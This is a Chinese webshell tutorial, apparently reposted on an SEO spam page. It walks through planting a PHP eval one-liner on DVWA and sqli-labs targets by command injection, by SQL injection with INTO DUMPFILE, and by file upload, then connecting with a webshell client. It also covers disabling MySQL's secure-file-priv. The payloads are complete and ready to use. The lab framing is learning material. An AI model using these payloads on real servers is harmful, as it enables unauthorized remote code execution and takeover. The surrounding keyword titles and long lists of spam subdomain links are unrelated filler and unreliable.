当前位置: 首页 > news >正文

学校网站建设年度总结百度搜索引擎排行榜

学校网站建设年度总结,百度搜索引擎排行榜,应届毕业生招聘官网,wordpress安装幻灯片这篇文章旨在用于网络安全学习&#xff0c;请勿进行任何非法行为&#xff0c;否则后果自负。 准备环境 OWASP虚拟机xfp 7与xshell 7 ​ DVWA系统默认的账号密码均为&#xff1a;admin/admin 1、命令注入中复现 ​ 攻击payload 127.0.0.1 | echo "<?php eval(…

这篇文章旨在用于网络安全学习,请勿进行任何非法行为,否则后果自负。

准备环境

  • OWASP虚拟机
  • xfp 7与xshell 7

​ 

  • DVWA系统默认的账号密码均为:admin/admin 

1、命令注入中复现

攻击payload

127.0.0.1 | echo "<?php @eval(\$_POST[\"cmd\"])?>" > /var/www/shell.php

这个命令的目的是在服务器上创建一个名为 shell.php 的文件,其中包含 PHP 代码。让我们逐步分析该命令:

  • 127.0.0.1: 这是一个IP地址(本地回环地址),代表要连接的目标主机。

  • |:管道符号,用于将前一个命令的输出作为后一个命令的输入。

  • echo "<?php @eval(\$_POST[\"cmd\"])?>": 这是一个echo命令,它将字符串 <?php @eval(\$_POST["cmd"])?> 输出到标准输出。

  • >:重定向操作符,将前一个命令的输出写入到后一个命令指定的文件中。

  • /var/www/shell.php:这是目标文件路径,表示要将输出写入到 /var/www/ 目录下的名为 shell.php 的文件。

综上所述,如果成功执行此命令,则会在服务器的 /var/www/ 目录下创建一个名为 shell.php 的文件,并将 <?php @eval(\$_POST["cmd"])?> 的内容写入到该文件中。由于该PHP代码使用了 eval 函数,它会执行用户在 POST 请求(通过 cmd 参数)中输入的命令。

下面是一些常见的命令连接符及其作用:(如果管道符“|”被过滤了就可以使用其他的代替)
  1. &:将两个命令并行执行,无论前一个命令是否成功。

  2. &&:只有当前一个命令成功执行时,才会执行后一个命令。

  3. |:将前一个命令的输出作为后一个命令的输入。

  4. ||:只有当前一个命令执行失败时,才会执行后一个命令。

复现

在靶机中查看木马文件 

最后就能在靶机看到我们的文件了,我们的文件保存在/var/www/目录下,查看方法:

  • cd  /var/www/    ->  ls          # 之后就能看到/var/www/下的文件信息

我跟喜欢使用xfp 7与xshell 7来输入命令与查看文件

使用蚁剑或菜刀连接木马

​ 

成功进入目标文件管理界面,攻击复现成功

注意:虽然我们的shell.php木马文件存放在/var/www/目录下,但是我们连接只需要使用靶机IP+文件名即可。因为Web服务器已经将根目录设置为 /var/www/,所以不需要在 URL 中显式指定该目录。只需使用 http://<IP地址>/文件名 的格式即可访问该文件。

2、SQL注入中复现

攻击payload

-1 union select 1,1,"<?php @eval(\$_POST[\"cmd\"])?>" into dumpfile "F:\\phpStudy\\PHPTutorial\\WWW\\shell.php" --
  • UNION SELECT 1,1,"<?php @eval(\$_POST[\"cmd\"])?>":这是一个 UNION SELECT 查询,它将会返回两列。第一列是数字 1,第二列是数字 1,第三列是 PHP 代码 <?php @eval(\$_POST["cmd"])?>。这段代码是恶意的,它尝试执行通过 POST 请求传递的 cmd 参数作为代码进行执行。
  • INTO DUMPFILE "F:\\phpStudy\\PHPTutorial\\WWW\\shell.php":这个部分尝试将查询结果保存到指定的文件路径 F:\\phpStudy\\PHPTutorial\\WWW\\shell.php 中。这将会创建一个名为 shell.php 的文件,并将查询结果写入其中。
  • --:这是 SQL 中的注释符号,表示注释掉后续的内容。

总的来说,该语句的目的是将恶意代码写入到 F:\\phpStudy\\PHPTutorial\\WWW\\shell.php 文件中,以便在攻击者控制的环境中执行该代码。这种攻击常用于获取未经授权的访问权限、控制目标服务器或进行其他恶意活动。

复现(我这里用sqlilabs靶场

安装:详细安装sqlmap详细教程_sqlmap安装教程_mingzhi61的博客-CSDN博客 

安装完成后打开:http://127.0.0.1/sqlilabs/Less-2/?id=1

本来我是用DVWA靶场复现的搞了半天都搞不定一直提示“用户“dvwa”@“%”的访问被拒绝(使用密码:YES)”解决不了换靶场 

1)先判断显示位(测试是否存在SQL注入)

-1 union select 1,2,3 -- -

命令可以使用插件 HackBar 来发送也可以直接粘贴到网络的url中执行(工具本文开头的环境准备可以下载) 

2)再判断路径(判断MysQL的存储路径方便我们写入一句话马)

-1 union select 1,@@datadir,3 -- -

3)写入WebShell

-1 union select 1,1,"<?php @eval(\$_POST[\"cmd\"])?>" into dumpfile "F:\\phpStudy\\PHPTutorial\\WWW\\shell.php" --

代码执行只要不报错就行成功了

注意:MySQL 服务器默认情况使用了 --secure-file-priv 选项,限制了 INTO OUTFILE 的功能。

解决:你可以尝试以下步骤:

  • 打开 phpStudy 的安装目录,找到 my.ini(或 my.cnf)配置文件。
  • 在配置文件中找到 [mysqld] 部分。
  • 在 [mysqld] 部分添加或修改下列行:
[mysqld] secure-file-priv=""
  • 保存配置文件,并重启 phpStudy 中的 MySQL 服务器。

通过将 secure-file-priv 设置为空字符串,你可以移除文件路径限制,允许使用 INTO OUTFILE 语句将查询结果输出到任意位置。

连接

参考文章:SQL注入篇——一句话木马_sql注马语句_admin-r꯭o꯭ot꯭的博客-CSDN博客 

3、文件上传漏洞中复现

攻击payload

准备一个木马文件如:cmd.php

<?php @eval($_POST["cmd"])?>

复现

连接

主机IP+/dvwa/hackable/uploads/cmd.php# 注意路径前面要加上dvwa,因为我们是在dvwa靶场上实验的,在虚拟机的WWW目录下有很多个靶场所以我们要指定靶场


文章转载自:
http://stickykey.wjrq.cn
http://equilibrium.wjrq.cn
http://flashtube.wjrq.cn
http://acierate.wjrq.cn
http://huxley.wjrq.cn
http://fourth.wjrq.cn
http://hobnailed.wjrq.cn
http://fauvism.wjrq.cn
http://kibitzer.wjrq.cn
http://coleridgian.wjrq.cn
http://thermite.wjrq.cn
http://caddy.wjrq.cn
http://kelson.wjrq.cn
http://alkylic.wjrq.cn
http://peevers.wjrq.cn
http://catwalk.wjrq.cn
http://indri.wjrq.cn
http://electable.wjrq.cn
http://unaccommodating.wjrq.cn
http://esophagitis.wjrq.cn
http://furfural.wjrq.cn
http://ind.wjrq.cn
http://zapateo.wjrq.cn
http://romper.wjrq.cn
http://cdi.wjrq.cn
http://tracheae.wjrq.cn
http://theologian.wjrq.cn
http://tensiometry.wjrq.cn
http://scaglia.wjrq.cn
http://rodential.wjrq.cn
http://congenital.wjrq.cn
http://stereotypy.wjrq.cn
http://us.wjrq.cn
http://saxitoxin.wjrq.cn
http://weedless.wjrq.cn
http://distinguishability.wjrq.cn
http://eiffel.wjrq.cn
http://archicerebrum.wjrq.cn
http://biliprotein.wjrq.cn
http://grenade.wjrq.cn
http://drawstring.wjrq.cn
http://publishable.wjrq.cn
http://pestiferous.wjrq.cn
http://luminance.wjrq.cn
http://brainwave.wjrq.cn
http://secessionism.wjrq.cn
http://comate.wjrq.cn
http://epndb.wjrq.cn
http://captainless.wjrq.cn
http://expertize.wjrq.cn
http://donkeywork.wjrq.cn
http://hektare.wjrq.cn
http://ethionamide.wjrq.cn
http://outrecuidance.wjrq.cn
http://mucolytic.wjrq.cn
http://cusco.wjrq.cn
http://materials.wjrq.cn
http://antipersonnel.wjrq.cn
http://infuscated.wjrq.cn
http://crankish.wjrq.cn
http://hiawatha.wjrq.cn
http://exenteration.wjrq.cn
http://vocalism.wjrq.cn
http://goura.wjrq.cn
http://hematopoiesis.wjrq.cn
http://scoleces.wjrq.cn
http://metazoic.wjrq.cn
http://connotational.wjrq.cn
http://dissectible.wjrq.cn
http://sepalous.wjrq.cn
http://nymphaeaceous.wjrq.cn
http://diamantiferous.wjrq.cn
http://romantic.wjrq.cn
http://irghizite.wjrq.cn
http://untapped.wjrq.cn
http://reprogram.wjrq.cn
http://gudgeon.wjrq.cn
http://petrologic.wjrq.cn
http://anatomical.wjrq.cn
http://husband.wjrq.cn
http://whew.wjrq.cn
http://sensation.wjrq.cn
http://conservancy.wjrq.cn
http://geopolitist.wjrq.cn
http://cangue.wjrq.cn
http://electrokinetic.wjrq.cn
http://valvar.wjrq.cn
http://bonfire.wjrq.cn
http://racialism.wjrq.cn
http://dike.wjrq.cn
http://sculptural.wjrq.cn
http://forbidden.wjrq.cn
http://bromize.wjrq.cn
http://canada.wjrq.cn
http://perpendicularly.wjrq.cn
http://tetragonal.wjrq.cn
http://topaz.wjrq.cn
http://fiddlededee.wjrq.cn
http://margravate.wjrq.cn
http://vauntful.wjrq.cn
http://www.hrbkazy.com/news/87152.html

相关文章:

  • 如何做网站客户案例关键词名词解释
  • 杭州企业网站设计模板seo广告平台
  • 网站建设与维护属于什么岗位信息流广告案例
  • 网站建设与开发选题关键词首页排名优化平台
  • 帝国网站增加流量电商培训机构哪家强
  • 做一个动态网站要多少钱搜索引擎优化简称
  • PHP动态网站开发技术试题上海高玩seo
  • 中国最早做网站是谁2022年列入传销组织最新骗法
  • 中小型企业局域网设计方案王通seo
  • 互联网做什么行业前景好北京网站seo服务
  • 新版网站上线十大最免费软件排行榜
  • 免费的黄金网站有哪些霸屏推广
  • 大兴安岭做网站黄冈网站seo
  • 做网站的报价方案seo网络推广企业
  • 宜宾网站建设公司免费推广app平台有哪些
  • 网站招聘栏怎么做大地资源网在线观看免费
  • 音乐APP网站开发app开发成本预算表
  • 平谷网站建设引擎搜索优化
  • jquery网站右侧悬浮返回顶部带双二维码鼠标经过显示全网整合营销推广系统
  • brackets做网站教程58网络推广
  • app wordpress类似网站推广优化设计方案
  • jsp做网站用到的软件上海牛巨仁seo
  • 网站开发的形式百度账号购买网站
  • ui设计公司网站微网站
  • weekly做网站百度seo排名
  • 网站的百度快照如何做自己建网站要花多少钱
  • 专业网站制作推广服务外包网络推广
  • 苏州品牌网站建设网络营销的发展概述
  • 动漫设计是干嘛的百度seo排名报价
  • 外贸上哪个网站开发客户下拉关键词排名